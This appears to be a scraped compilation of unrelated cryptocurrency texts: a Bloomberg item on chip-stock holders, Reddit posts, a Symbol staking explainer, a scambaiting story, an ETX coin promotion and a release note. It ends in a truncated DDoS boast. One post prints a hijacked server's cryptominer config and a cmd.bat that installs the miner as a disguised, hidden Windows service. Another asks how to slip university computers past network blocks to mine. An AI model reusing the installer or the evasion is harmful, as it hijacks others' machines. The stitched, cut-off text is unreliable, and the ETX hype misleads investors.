Bloomberg: Top AMD Holders Kept Buying Shares as Rally Stalled Last Quarter
Wednesday, November 15, 2017 10:25 AM By Brad Olesen (Bloomberg) -- Third-quarter investor disclosures are in, and bitcoin-mining proxies Advanced Micro Devices Inc. and Nvidia Corp. encountered widely different hedge fund and investor interest as the cryptocurrency rose 67% during the period. As AMD share price performance stagnated over the quarter ended Sept. 30, some of its top shareholders lent some support. Discovery Capital, already among the largest holders, added 2.39 million shares, a boost of more than 12% to its stake. Wellington Management added 7.6 million shares, the most of any holder in the period, further cementing its position among the top 5 holders. Nvidia has almost doubled this year, with much of the rally taking place during the third quarter, and Central Asset Investments & Management Ltd of Hong Kong sought to go all in. By far the largest accumulation in Nvidia by a factor of nearly eight, the fund now counts Nvidia as its largest holding with a market value of $2.5 billion. Considering the fund itself is valued only at $3.2 billion, that’s quite a bet. The fund also became a top 10 holder in NetEase Inc. These two investments now account for nearly 97% of the entire fund, according to data compiled by Bloomberg.
Hi, I have access to a lot of computers at my uni, and they all have some pretty decent GPU's - however most of the time they're not being used. I tried running GUIMiner earlier today on them, mining at Slush's pool, but it seems the network restrictions suck, and port 8332 is blocked. I'm going to take a while stab in the dark and assume 80 is open, seeing as I can browse the internet just fine - what's the easiest way to connect to Slush's pool via port 80? My guess is a proxy, but I'm not sure where to start - any guidance would be very helpful. Cheers
u/deadbeat1000 totally saw the denial of Craig's Motion for Summary Judgment coming
In this post I'm going to go through a selections of quotations from our dear friend u/deadbeat1000 on this score: First his most recent one where he echoes the rationalisation in the latest Coingeek article on this and says:
This really comes as no surprise.
So clearly he saw this coming, right? He didn't make a bunch of comments several months back where he seemed certain Craig was going to win this motion? Let's find out. This quote doesn't look good (my emphasis added):
W&K was formed by CSW's wife, Lynn Wright and Dave in order to enable them to bid on government contracts having nothing to do with mining Bitcoin. And W&K was formed not at a "partnership" but as a Limited Liability Corporation (LLC). Therefore, it really should be about shares in a corporation and a corporate structure not an assumed "50:50" partnership. In a corporation there are voting rights and thus before Ira could sue CSW on behalf of W&K, there would have to be a vote by the shareholders. In this case Lynn & Ira as CSW relinquished his stake in the company during his divorce. In other words, Lynn is alleging that Ira has violated W&K legal structure and corporate governance. She was never informed, consulted, and voted on Ira's suit on behalf of W&K as the majority shareholder of W&K. This blows Ira whole case as he is actually committing fraud by misrepresenting his authority on behalf of W&K to bring suit against CSW. Actually it also reflects on Velvel Freeman as yet another shyster lawyer who looks to use the courts as a shakedown proxy. This case should have never been brought and it also reflects badly on Reinhart who should have dismissed this case just from demanding the legal paperwork of the corporate structure of W&K.
I'm about ready to revoke your account on this board because you are acting like an ass. This is a legal matter and there is settled law about business legal structures. W&K is a corporation and as a corporation all revenue is owned by the corporation and not the individuals. Lynn Wright is the majority shareholder of W&K and she is the one who gets to decide the disposition of W&K via her controlling interest.
It looks like Ira has some explaining to do. Isn't ironic how the trolls scrutinize every utterance of CSW but never took the time to examine Ira's behavior. And worst yet is the court for not even demanding the business filings that are on file with the Secretary of State of the State of Florida. This whole case has been a travesty from the start designed as a shakedown and should have been thrown out immediately by the Magistrate. What they managed to do was to get CSW to fork over $135,000.00 USD for a process "error" that wasn't even of his own making but due to Reinhart & Freedman's ignorance of Bitcoin. The dilettantes and the mediocre are truly in charge.
Looks like Ira doesn't have any explaining to do as the claim was thrown out. Don't worry deadbeat, you're not alone in being blind-sided like this. Calvin was too, and he's footing the bill for his sugar-baby Craig because were he not these legal bills these overworked lawyers are charging as they try to save Craig from his own web of lies would be too onerous for poor Craig. You'd think these people who saw this coming might have given at least him a head's up given his financial involvement in the case.
Heres some proof about sigma not being a trojan and omikron client proof from the sigma creator andro
The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher. And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft). Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares. Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/ And Omikron client was not a bitcoin miner, here's the copypasta :
Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy. But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.
Edit, another copypasta:
I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this usepass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.
The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended. Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).

My collection of amazing early Bitcoin comments, right here from Reddit:
On buying (or not) a gaming rig to mine Bitcoin: “With the difficulty skyrocketing and exchange rates sitting stagnant at $5~8 for the last week or so, you pretty much missed the boat to buy dedicated mining hardware, IMHO. If you already have the hardware, or are looking for an excuse to buy a couple bitchin' new graphics cards for a gaming rig, there's definitely money to be made mining when you're not using it. But I don't think I'd drop $1k into a rig that's only to mine with unless it was $1k I'd blow on something even more retarded. I certainly wouldn't sink next month's rent into it.” https://reddit.com/AskReddit/comments/hnp7f/_/c1wuv1b/?context=1 On easily cashing out Bitcoin using mtgox: “I think getting money is not that difficult. The daily volume on mtgox is over $100K, so I think anyone can currently sell Bitcoins for USD without problems.” https://reddit.com/AskReddit/comments/hnp7f/_/c1wuhjh/?context=1 On it being $10: “Is Bitcoin 10 usd yet?” https://reddit.com/Bitcoin/comments/hpq6c/is_bitcoin_10_usd_yet/ Bonus: Snapshot of the isbitcoin10usdyet website from 2011: https://web.archive.org/web/20110606125320/http://www.isbitcoin10usdyet.com/ Mtgox might disappear: “400K bitcoins is $4M dollars. Given all risks and uncertainties around bitcoins, no wonder some of the early founders exit their investments. Tomorrow mtgox or dwolla may disappear. It is the matter of one government intervention.” https://reddit.com/Bitcoin/comments/hq1wj/_/c1xgesq/?context=1 Bitcoin is terrible at friendly front-end: “This is a dangerous point-of-view. The entire bitcoin ecosystem is ugly, confusing, and deeply unusable. Really think about the questions posed in the article. The client works, as in, it creates a functional front-end for some bitcoin-related tasks, but it isn't at all designed for how humans would want to interact with the currency. The point of the article isn't that the client is hard, it's that the client works pretty well for obsessive nerds (present company included), but if bitcoin is really going to succeed at the goals it sets out to accomplish, it needs to not only be usable by normal people, it needs to be exceptional. If you think it's reasonably usable, you're welcome to that opinion, but please understand that you're the exact sort of person Mr. Falkvinge was referring to. Great with complex logic, terrible at friendly front-end.” https://reddit.com/Bitcoin/comments/hrqpm/_/c1xtfuy/?context=1 On wallets going out of sync: “One thing that I think is lacking is the ability to functionally use wallets on different machines as they will tend to get out of sync. This might be able to be overcome if new addresses were deterministically created from a seed contained in the wallet, but there are probably better ways. Also, the UI for the official client is kind of a bone.” https://reddit.com/Bitcoin/comments/hrqpm/_/c1y730k/?context=1 On Bitcoin’s ease of use: “In fact, BTC is in such an infant state right now only enthusiasts investors, and geeks who can actually grasp how the system truly works, are using it for real. The usability issues raised by the article are real. No grandma, or any well respected enterprise for that matter, would accept working with this type of GUI. If anything, a REAL enterprise backend still needs to be developed to handle the BTC's ungly guts, with all transactions details, hashes, mining, wallets, proxy connections, peer discovery via IRC channels... I mean... this is all too RAW for the end user. I can see a near future where startups will begin to offer user friendly GUIs, online access, maybe even online banking for your bitcoin accounts, automated backups and safety mechanisms to protect your coins in case of theft. All of us geeks will end up supporting the bootstrap of this network so that, later on, your grandma will be able to use this just as she would use a credit card today.” https://reddit.com/Bitcoin/comments/hrqpm/_/c1xungz/?context=1 rBitcoin is not a sub for memes: “This isnt a subreddit for memes. Take it back to pics” https://reddit.com/Bitcoin/comments/i7z0v/_/c21m3ld/?context=1 I think I’ll keep my money elsewhere: “This further reinforces BC's image as nothing more than a Ponzi scheme. When the distribution is skewed that heavily towards early adopters, they will have almost total control over the market. Those 32 could manipulate to their hearts content. I think I'll keep my money elsewhere....” https://reddit.com/Bitcoin/comments/ifl26/_/c23e3ei/?context=1 Tulip mania: http://en.wikipedia.org/wiki/Tulip_mania https://www.reddit.com/AskReddit/comments/hnp7f/i_just_invested_half_of_my_next_months_rent_in/c1wuhkt/
Delegated harvesting lets you passively earn block rewards on-chain
Symbol has a noteworthy economic system that allows you to passively earn coin rewards just as if you were mining. This is better than staking rewards given by exchanges since you don’t need to put your coins on an exchange and you are earning actual block rewards. On most other blockchains you have to operate a node in order to earn block rewards. That can be expensive and difficult for casual users. With our delegated harvesting system, your rights to earn rewards are based on how many XYM coins you are holding, but Symbol lets you delegate those rights to someone else’s node so they will earn rewards on your behalf. You’ll earn on-chain block rewards even when your computer is turned off, and the rewards are sent to you instantly, the moment they are earned. It requires a minimum balance of 10,000 XYM, and you can do it easily through a dashboard. Here’s how it all works.
Let’s chain some blocks
A quick block reward review: the process of adding transactions and other data to a blockchain is called creating blocks, and it’s what every computer in the network is trying to do. Blockchains pay a coin reward to the first account to create a new accepted block. The reward is called a block reward. If new coins are created to pay the block reward, it’s called mining. Symbol doesn’t create new coins for block rewards so it uses the term harvesting instead, but it’s nearly the same as mining.
We want proof
What’s the point of all this mining and harvesting? The problem is that anyone can join the network anonymously, so we would expect cheaters sending false data so they can spend the same coins twice or make other fake transactions. If we don’t know who is trustworthy, how do we choose who gets “write access” to account balances? Bitcoin and many early protocols use a Proof of Work (POW) system. In POW every computer in the network is processing calculations as fast as possible until someone gets the right number. Whoever gets it first creates the next block. POW is effective at discouraging cheaters because it’s expensive to buy and power all the machines needed to mine profitably. Anyone who could make such a mining investment won’t want to risk being rejected.
Not that proof, different proof
The biggest drawback of POW is its insatiable consumption of electricity. It’s estimated that bitcoin alone consumes a quarter percent of global energy production. Unfortunately, that’s not a side effect, it’s the point; the more expensive it is to create blocks, the harder it is for bad actors to take over. In the early days users could mine POW coins on a laptop, but today it’s so expensive that only large industrial operators are competitive. The most popular alternative system is Proof of Stake. POS is well-tested and has proven secure at large scale, and best of all, it requires no special energy usage. In a POS system, the protocol chooses an account at random to be the next block creator. However, an account’s chance of being chosen depends on the number of coins it holds. So users with the highest account balances have the highest chances of creating new blocks. This is a good way to ensure security, but one downside is that it encourages hoarding.
Proof of stake plus
Symbol uses a Proof of Stake Plus (POS+) system, which adds a few weighting factors on top of Proof of Stake to incentivize a healthier economic system. For example, POS+ gives an advantage to accounts that have many recent transactions in order to encourage network usage. So if you need to pay a lot of transaction fees, that expense can be offset somewhat by higher block rewards. This addresses the hoarding problem, but not the expense and difficulty of running a node. We want everyone to participate in harvesting whether or not they are paying to run a node. Owning a minimum of 10,000 XYM automatically gives you the right to harvest, so the idea is to use your earning rights on someone else’s node. This is where delegating your stake comes in.
Keep your keys in your pocket
The tricky part is that if you gave a node operator direct access to your stake, they would be able to see your private key and possibly take your funds. Symbol solves this problem by creating a proxy account with a different private key that’s used only for delegated harvesting. This allows you to delegate your harvesting rights to any available node without allowing them access to your account. https://preview.redd.it/lhv350glzkg51.png?width=1583&format=png&auto=webp&s=f2d9af8185d027221bf7d0531a667f6ada6731d4 There’s no minimum holding time or obligations for your coins, and you can spend them just as easily as non-delegated accounts as long as your balance is 10,000 or above. If your account drops below 10,000 it will simply stop harvesting with no side effects. If the node you are working with is going down a lot or otherwise annoying you, just use the dashboard to stop delegating or switch your delegation to another node any time you like.
What’s in a block reward?
There’s one more detail: any node that you have delegated to will keep 25% of the rewards earned by your delegated stake. This is their incentive to keep their node running. If you don’t like giving them a cut, you need to run your own node. Now the good part: every block reward on the Symbol public chain will contain new tokens added for inflation, incentives for early adopters, and will also contain all transaction fees paid. 100% of transaction fees are returned to harvesters in block rewards. The system is estimated to provide about 3% to 4% returns for delegated harvesters, although rewards could be lower or higher if there are a lot of transaction fees paid.
A quick hypothetical example
Let’s say there are 1 billion XYM tokens staked on the Symbol public chain. Your account balance is 20,000. This gives you about a 1 in 50,000 chance to be the harvester of any given block. Blocks are created every 15 seconds, which adds up to 5,760 blocks per day. Your account would be expected to harvest a block reward about once every 8.7 days.
Configuration of delegated harvesting
The Symbol public chain has a requirement of 10,000 XYM minimum balance for delegated harvesting, but if you are running your own Symbol blockchain you can change it to any token and any amount you want. You can also change the inflation rate, transaction fees, and other economy settings. In a corporate private network there is usually little need for decentralization and incentives since everyone on the network will be known and trusted. In this type of private chain you can even remove transaction fees. However, since Symbol is open-source, it’s also simple to run your own public version configured with any requirements you need.
On-chain staking rewards
Staking rewards are becoming more common on exchanges, and many users are coming to expect it. That’s good because staking rewards provide more opportunity for users to earn coins and encourage new users to enter the industry. Unfortunately these custodial exchanges and wallets require users to give up their keys. It’s nearly always more secure to hold tokens off exchanges, especially if holding long term. Symbol and its original version NEM are unique in their method of allowing users to delegate their stakes and earn rewards without giving up custody and without any risk of sharing their private keys. Delegated harvesting on Symbol is likely to be the best way in the blockchain industry for users to earn on-chain staking rewards without the chore and expense of running a node. Source

Delegated harvesting on Symbol is likely to be the best way in the blockchain industry for users to earn on-chain staking rewards without the chore and expense of running a node. Source
The drowned millionaire, poisoned pooch, secretary from hell and lawyer gone wild. A very long work in progress.
I literally don't know where to start with this. It's been going on for a month now, and the guy has sent over fifty emails. I'm in lockdown with nothing to do so this is it. I've also set up a functional webpage to guide him to, but the logs indicate he is using a proxy in the USA. Still it lets me flesh out the characters a bit. TPDNE is great for website photos. It all began with a lovely email in my normal Gmail account to say my uncle had left me some cash and could I get in touch. So I arranged for Sir Dr John Mansfield to do just that. Suddenly the deceased's surname became Mansfield too! As John put it: It's a little difficult to explain what my occupation is these days! As you probably know, I'm a very well-known retired businessman and these days having millions or billions in the bank is just boring. So getting involved in little projects like this is really what I like to do. And sometimes even travel a little. I had a gentleman in Mali who arranged a similar, very lucrative project. I actually flew there! And he had disappeared. I don't know, I think he wasn't well. But you know, I loved Bamako. I actually invested in a real estate project there. I sent them some tiny amount - maybe $10 million or so, less than my country cottage is worth, and they sold me a skyscraper! They have promised me I can come see it next time I'm in Mali. I've actually had someone contact me with the same problem you have now; apaprently some long lost uncle of mine died in the Phillipines and I just paid some tiny amount of stamp duty (will I need to cover this with you too?) and eventually they will be sending me the estates of poor uncle Jimmy. Anyway thank you, it's nice to chat. I'm losing my memory quite badly and sometimes get lonely out here on the Moors in my luxurious castle of solitude so it is great to hear from friendly and helpful people like you. Do you know my nephew Finken? He used to live in Togo, or Toga, or maybe it was Texas? Not sure. If you'd like to arrange your flights please go ahead. I'm halfway between Assleby and Laytham; just ask anyone around and they will direct you. Just turn right off the main road, and head down the driveway. I'm about seventeen miles down the main drive. There is a row of ancient elm; turn right here, and drive about five miles along until you see the towers. Just shout "ahoy there Sir Mansfield" and I'll come out with a dram of Laphroiag to great you. This reminds me of when someone in Mali wrote to me, and we arranged a whole thing. For about $20m I bought a whole office building! Quite extraordinary. My nephew Finken used to live in Mali, or Togo I think. Anyway my memory isn't so great. An hour later David hadn't replied! This won't do Sir John: I need to move on this immediately send the details let's get on with it I'm heading to Bangladesh for a sensitive matter will be unable to email/write/eat for four days please hurry up and stop wasting my time. I need $45,000 by Thursday morning. My boy can send through the necessary. [That got him going:] Dear Mr John, I have already send the information to the bank but yesterday the bank said they need your copy passport too for identification before they can proceed in the processing. SJ: No problem at all. Does that need to be notarized? [several emails later..] SJ: I've attached the passport as requested [note: nothing attached...several more emails back and forth] SJ: I have attached a copy, I hope it is OK, I have very poor eyesight. I’ve had the boy block out my face in case it accidentally falls into someone else’s hands. Let me know if that’s a problem. [passport is a stock photo of a passport almost completely blacked out] SJ: I’ve just received an email from my secretary. They are trying to get power of attorney which means I will have no power over my own finances. They tell me they will “take care of my bitcoin” and “everything will be ok”. I have nowhere to turn. Please remind me how much this inheritance is. Can it please be paid to a different bank account. I can’t have them knowing about this. Please please hurry. This has to be completed within about 48 hours. Yours in concern Johnny [despite no passport or anything useful sent David writes back:] Dear Mr Johnny, I have submitted the passport to the bank so I am expecting that the bank will contact you. The total amount to be transferred to your account is USD30 Million As soon as the bank contacts you do let me know. [30 million!] Dear David: Thank you so so much my man. Praise Jesus, I have never experienced such honest business before. May you be bless with the Lord’s grace my friend. And all the Blessings of heaven. I do hope the bank would be kind enough to contact me very soon, as that bitch Miss Hedda and her gang of goddamned usurpers are going to steal what’s mine like the bloody scum they are. May God grant you all you need and if we don’t speak again, Bless you in the name of Jesus. Love, Johnny [finally he asks me for some cash:] Dear John, I am still waiting your call , besides the bank said that since your passport has no picture that they will legalize it so they demands that i go and legalize it and bring to them. Send me immediately by western union the sum of $350 to legalize it here. send it in my name name: Tamale David city: Lome country: Togo Send the information urgently let me get the money and do the legalization so that the bank will start the processing of the transfer to your bank account Regards, [another email to David, subject line is a Smiths song title:] THIS IS A CODE DO NOT TELL MISS HEDDA David: OK I WILL NOT TELL MISS HEDDA DO SEND THE MONEY LET ME COMPLETE THE LEGALIZATION OF THE PASSPORT AND SUBMIT TO THE BANK ON MONDAY SO THAT THEY CAN PROCEED IN PROCESSING THE TRANSFER TO YOUR BANK ACCOUNT [I reply] On Sat, Aug 29, 2020 at 12:40 PM <[[email protected]](mailto:[email protected])> wrote:
THIS EMAIL IS IN SECRET CODE. I'm going to need to you send me the email again but please replace the words with the ones below so I can delete the previous email. Lower case is also better for the office's so-called "spam filter".I have sent 350 "BAZOOMBAS" as requested.iF "DAXID" can Speak to the "BONK" on Monday may they transfer to my BONK account. I can BONK on Monday but I never BONK on a Tuesday. Please confirm you will 'BONK' on Monday.thanks,Johnny M
[I've had him completely retype a few emails to put them in lower case] anyway that's enough for John. Enter Hedda..I'll add a comment Sir Dr John from his website

Hi guys, As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds. https://imgur.com/a/yArkTR8 By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here: { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true } cmd.bat contents are the following: attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly. I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly. What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell. Thank you for reading and stay safe :)
What prevents state actors from proxying millions (USD) to mining pools to launch a 51% attack.
Update
u/cointastical made some awesome arguments about a POW fork being pre-baked and ready as a "break glass" emergency roll-out. This HAS been done before BTW. Another great idea about having a grass-roots campaign for everyone to use the invalidateblock command on their node to nullify the attack. Again done before, though on another coin. Assuming that there exists some subset of miners that work completely to their own self interests and without any greater good or altruistic motives, how would you foresee the following dystopian fiction play out. By rough estimates about 80% (proof tbd) of the bitcoin network mining exists in mining pools. These pools compete in a free market to entice independent miners to join their pool. The rates are paid in BTC per TH/s. The current price to "rent" the entire bitcoin networks pooled mining resources is about $9 to $10 million / day (proof). This is entirely within the budget of state actors, even the $3 billion to rent the bitcoin network for an entire year doesn't sound far fetched when considering government spending. So if a state actor (government) were to partner with some established mining pool they could subsidize that pool to offer unrealistically high rates to entice more and more miners (in their self interest) to join their pool. Once they reach majority (51%) they could exclude blocks from other small independent mining pools tilting the tables more in their favor. These early attacks would create long (25 block) reorgs (proof), but eventually, as they gained more market, they could make the attacks pretty quick. Each attack could exclude blocks from a 1% pool, 2% pool, and so-forth till they attack 1/3 (33%) of the miners at which point they control the whole network (proof tbd). So assuming miners work in their own self interest, why wouldn't they join this obviously evil mining pool if that pool was offering 50% above market rate for their mining power compared to competitors?
Where can you actually SPEND dogecoins? [Please Add on]
When trying to explain dogecoin to people for the first time, the #1 question I get is "Yeah but, can you actually use it to buy things?" One of the major things that will take Dogecoin to the moon will be people actually using the Ð. For a currency to gain legitimacy, it's got to be spendable. The good news is, there are sites popping up that take the Ð! Some sites also list other sites that take the Ð and serve as directories. Considering how great this community is and how quickly we are growing, the number of transactions and using Ð as real money could really make the difference!
All links are provided with the best of my knowledge. Please make sure to check the shops listed here yourself again, before spending your Dogecoins there. In no way should the admin of this website be responsible for any fraudulently activities from any listed shop.
Hey /beermoney users, I have been using fluidstack for the past month and I have some serious issues which I thought were just subject to my own network but then I was made aware of it effecting all of my referred friends in USA and UK. I have learned that Fluidstack is abusing our networks and opening it to heavy amounts of fraud, media streaming abuse, and more. Let me explain further for those of you which will say “but they pic me $5”....I am going to go service by service : Netflix - fluidstack has been sending mass numbers of connections to Netflix through my network and the network of my friends in UK and Canada. I spoke to a representative at Netflix customer support and they said upwards of 300 accounts had logged into Netflix from my account in the past 24 hours. They then confirmed the reason why I was now UNABLE to watch any Netflix content was due to the fact that they further investigated and confirmed my IP was one of many being used as a VPN Providers IP. I argued with them for over an hour but had no luck resolving the matter. Then, I contacted over a dozen friends of mine that were also blocked from viewing any content on Netflix, Hulu and Amazon prime - I asked them to contact the streaming services and find out the issue. It turns out that a representative at Amazon prime named Dhiraj confirmed that a few VPN companies were using our ips to unblock copyrighted content and for that reason these ips would be blocked for a minimum of 6 months! Fluidstack is an amateur operation completely abusing our networks and giving VPN companies the ability to use our networks for not only trying to bypass media blocks but also giving common users the ability to use the internet through our ips. There is something very wrong with this. People use VPN services for general security but there are many consumers that use VPN services to commit fraud, terrorist threats, hacking , cracking , and more! @fluidstack, do you have any idea what you’re doing by allowing VPN companies to use a common users IP? I’ll tell you the happy ending though - after pleading for hours to get a new IP, I was assigned one , and I thought I stopped fluidstack from running but it was secretly running in the background and got the new IP blocked too! Bbc iplayer - I had referred over 100 customers of mine at a UK based service, and told them to use fluidstack. Within 7 days 100% of those users were unable to use BBC iPlayer . That too, with a permanent block! You can contact dan Taylor from bbc at his email [email protected] and he will confirm for you that he is aware of fluidstack and they’re banning every single IP which they find using fluidstack because fluidstack is handing everyone’s network over to a shady VPN company that is streaming bbc iplayer and more through Uk user networks and abusing the connection meanwhile. Swagbucks - I use swagbucks to make money as many beermoney users do. Obviously i also use many other survey and quick money services but this is a common one I’m using as an example. My friends and about 75% of the people I referred from a company I run, were all blocked from using swagbucks and when we tried to figure out why it was because there was fraudulent tasks going through swagbucks on our networks - it was not from us, and so we looked at our network usage and saw tons of connections to swagbucks, meaning fluidstack is promoting that fraud as well. Perhaps it would be different if they were supporting users making money in a safe way, but they’re allowing the abuse and so everyone is losing by using fluidstack. We don’t need services here which blatantly abuse our networks. We need safe and secure solutions which care about our well being. What’s the point of making a few dollars if fluidstack is making 100x as much from selling our bandwidth to these multimillion dollar VPN companies, and we are getting abuse on our network on top of tons of risks? This being said, I think fluidstack should shut its doors entirely and apologize to our community here. They’ve sponsored a giveaway here and for that reason they have a top post in this subreddit, but I don’t even think it’s logical to support them knowing this is happening. I am not the first client to report this. You can find many other posts like this with outraged providers . For example , please read https://www.reddit.com/FluidStack/comments/chzfzd/netflix_have_blacklisted_me/ . I know the fluidstack team will come here and suggest for users to remove their proxy feature and just leave the cpu sharing. However quite honestly I’ve been seeing cpu usage being quite high for the fluidstack app recently as well. How do we know they aren’t mining bitcoin with this massive network they’re putting together? Of course they can sponsor a few $25 giveaways if they’re mining or doing something shady to make money with our cpu. I believe a lot of fluidstack providers will read this and want answers. Be careful everybody, delete the application by going to your c drive then program files then find fluidstack then uninstall. Also check your processes and services in task manager to double check they aren’t secretly running after uninstalling. This is the shadiest operation I’ve ever seen and I think it’s time we protect the users that have been naive enough like I was to think this company would respect our network. We need smarter and more secure options. Fluidstack made an innocent service into a complete sham!
The new cryptocurrency "ETX" is been mining, its technology and potential have attracted much attention!
As the culmination of a new round of information technology innovation, the application of blockchain in the economic industry is pushing the entire economic system to achieve technological change, organizational change and efficiency change. The implementation of blockchain technology will bring the existing business model Refactoring. Among them, Bitcoin, as a representative of blockchain technology, has been in operation for 11 years from 2009 to the present. It has survived some crises and has been constantly improving and upgrading. On January 3, 2009, the first block: the genesis block was born, the first miner and bitcoin owner: Satoshi Nakamoto, the reward generated by the first block: 50 bitcoins. This also means that the formal birth of blockchain technology and digital currency has historical significance for today's digital currency market. https://preview.redd.it/uyjjvx99ars41.jpg?width=640&format=pjpg&auto=webp&s=0141ed26e5c38e4bd9fc610a13b4339f84656378 In the process of continuous development and improvement of the blockchain, many more excellent digital currencies have emerged, both from the technical level and the future vision, they all have relatively good performance. ETX (EthereumX-NET) is one of them, and it has been loved by digital currency enthusiasts in the early days of its birth. ETX public chain adopts a brand-new blockchain system architecture and is positioned as an easy-to-use high-performance blockchain platform designed to achieve the performance expansion of distributed applications to meet the real needs of the real world. In order to reduce the pressure on the main chain, ETX (EthereumX -NET) adopts a layered architecture of main chain + side chain. The main chain is only responsible for the circulation of ETX. DAPP runs on the side chain and completes the safe transfer of value between the main chain and the side chain through the ETX side chain transfer mechanism. The ETX public chain uses the mechanism of arbitrators' joint signature to ensure the security of transfers with the side chain. The main chain's currency holders jointly elect a certain number of "arbitrators". By signing, most arbitrators' signatures can unlock transactions on the main chain from the account representing the side chain to the ordinary account. https://preview.redd.it/jxwavl0cars41.jpg?width=640&format=pjpg&auto=webp&s=0edd4a872c293ef372ce47a47f3b022eb9da50de The ETX (EthereumX-NET) ecosystem has mining with a diversified main chain, and further releases the value of computing power through technology to bring higher returns to customers. In other words, these calculations can be used to do other things. Secondly, the ETX mining pool provides a one-stop node mining service for the mining pool for the main chain of ETX relying on the PoW + DPoS consensus mechanism. Election to the ETX mining pool seed node is the first step in mining ETX mining pool nodes. Next, the ETX mining pool will launch more node mining services under the PoW + DPoS consensus mechanism. At that time, miners can participate in mining and obtain mining rewards only by proxy voting. https://preview.redd.it/yib6c1bears41.jpg?width=640&format=pjpg&auto=webp&s=aecf7b0cefa8b819b90c7631f7c20bcaea8265b2 The technology and potential of the digital currency ETX (EthereumX -NET) that can be tapped are highly concerned. In the future, we will be able to make great achievements. Let us look forward to it together. I believe that in the near future, ETX (EthereumX-NET) will give us a generous return . (There are risks in the market, investment needs to be cautious, please do as your capability permits.)
Flowee 2020.04 release: New TransactionID service and new BCH-C++ library for P2P
This release adds some 80 commits, with git stats of 95 files changed, 6167 insertions and 529 deletions. More importantly, this release adds a new library to Flowee that is focused on the peer-2-peer protocol and implements all the basics any app would need to be an SPV (Simplified Payment Verification (8)) client, such as a wallet. Synchronized with this release the first beta release of a new wallet called, "Flowee Pay" is published with basic functionality to give an idea where this is going. We invite anyone to contribute with us to build the best open source Bitcoin Cash payment infrastructure there is. Back to this release: Bugfixes in the Hub and Indexer will help add stability to the suite and improvements in the NetworkManager library will be helpful for components like FloweeJS (released last week) and bitcore-proxy. In the Hub added a new service which is available now on the flowee.org API. This service allows applications to register a transaction-ID they are interested in and get a push notification upon its entering the mempool and a second notification when it gets mined. You chose the wrong hacker, fool I have a warehouse of 50 computational servers that at any moment, I can instantly activate. They will send so many ddos attacks to your internet, that you will be unable to use the internet at all. They run on a continuous circuit, and my main use for them is to mine bitcoin. The network effects of my ddos attacks are strong enough that if I leave them running for long enough, I can permanently disable someone's internet.. If it's a high profile target, like the government or a popular corporation, I can shut it down completely and keep it from working. It would be incredibly easy to sabotage those servers with malware. They run in the background, and can't be stopped. During my ten year career in electronic warfare, I've shut down over 100 hundred websites, and kept them completely shut down. It's fairly accurate and much more convenient than your average DDoS attacks. I could also issue arbitrary updates to web servers, turn flash players on and off, lock and unlock servers and so on. In addition, 